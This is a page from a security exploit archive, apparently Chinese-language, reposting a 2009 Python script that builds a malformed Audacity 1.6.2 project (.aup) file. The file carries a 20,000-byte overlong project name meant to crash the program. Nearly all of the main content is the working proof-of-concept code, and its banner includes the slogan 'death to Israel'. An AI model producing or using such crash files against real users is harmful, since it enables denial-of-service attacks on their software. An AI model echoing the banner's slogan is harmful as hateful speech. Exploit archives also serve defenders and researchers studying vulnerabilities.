首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit
来源:Evil finger & v4 Team 作者:Moad 发布时间:2009-01-08  
#usage: exploit.py
print "**************************************************************************"
print " Audacity 1.6.2  (.aup file ) Remote off by one Crash Exploit\n"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to: All friends"
print " almawto li israel\n"
print "**************************************************************************"
        
 
header = (
         "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72"
         "\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f"
         "\x3e\x0d\x0a\x3c\x61\x75\x64\x61\x63\x69\x74"
         "\x79\x70\x72\x6f\x6a\x65\x63\x74\x20\x70\x72"
          "\x6f\x6a\x6e\x61\x6d\x65\x3d\x22"
          )

header2 = (
        "\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
        "\x31\x2e\x31\x2e\x30\x22\x20\x61\x75\x64\x61"
        "\x63\x69\x74\x79\x76\x65\x72\x73\x69\x6f\x6e"
        "\x3d\x22\x31\x2e\x32\x2e\x36\x22\x20\x73\x65"
        "\x6c\x30\x3d\x22\x30\x2e\x30\x30\x30\x30\x30"
        "\x30\x30\x30\x30\x30\x22\x20\x73\x65\x6c\x31"
        "\x3d\x22\x30\x2e\x30\x30\x30\x30\x30\x30\x30"
        "\x30\x30\x30\x22\x20\x76\x70\x6f\x73\x3d\x22"
        "\x30\x22\x20\x68\x3d\x22\x30\x2e\x30\x30\x30"
        "\x30\x30\x30\x30\x30\x30\x30\x22\x20\x7a\x6f"
        "\x6f\x6d\x3d\x22\x38\x36\x2e\x31\x33\x32\x38"
        "\x31\x32\x35\x30\x30\x30\x22\x20\x72\x61\x74"
        "\x65\x3d\x22\x34\x34\x31\x30\x30\x2e\x30\x30"
        "\x30\x30\x30\x30\x22\x20\x3e\x0d\x0a\x09\x3c"
        "\x74\x61\x67\x73\x20\x74\x69\x74\x6c\x65\x3d"
        "\x22\x22\x20\x61\x72\x74\x69\x73\x74\x3d\x22"
        "\x22\x20\x61\x6c\x62\x75\x6d\x3d\x22\x22\x20"
        "\x74\x72\x61\x63\x6b\x3d\x22\x2d\x31\x22\x20"
        "\x79\x65\x61\x72\x3d\x22\x22\x20\x67\x65\x6e"
        "\x72\x65\x3d\x22\x2d\x31\x22\x20\x63\x6f\x6d"
        "\x6d\x65\x6e\x74\x73\x3d\x22\x22\x20\x69\x64"
        "\x33\x76\x32\x3d\x22\x31\x22\x20\x2f\x3e\x0d"
        "\x0a\x3c\x2f\x61\x75\x64\x61\x63\x69\x74\x79"
        "\x70\x72\x6f\x6a\x65\x63\x74\x3e"
  )
 
buff = "\x41" * 20000
exploit = header + buff + header2
try:
    out_file = open("crash.aup",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Perception LiteServe 2.0.1 (us
·VUPlayer <= 2.49 .PLS Universa
·CoolPlayer BUILD 219 (Playlist
·WinAmp GEN_MSN Plugin Heap Buf
·Joomla <= 1.5.8 (xstandard edi
·Cain & Abel 4.9.25 (Cisco IOS-
·CoolPlayer BUILD 219 'Playlist
·CuteNews <= 1.4.6 (ip ban) XSS
·VUPlayer version 2.49 local de
·GOM Player 2.0.12.3375 (.ASX F
·SeaMonkey <= 1.1.14 (marquee)
·Pizzis CMS <= 1.5.1 (visualizz
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved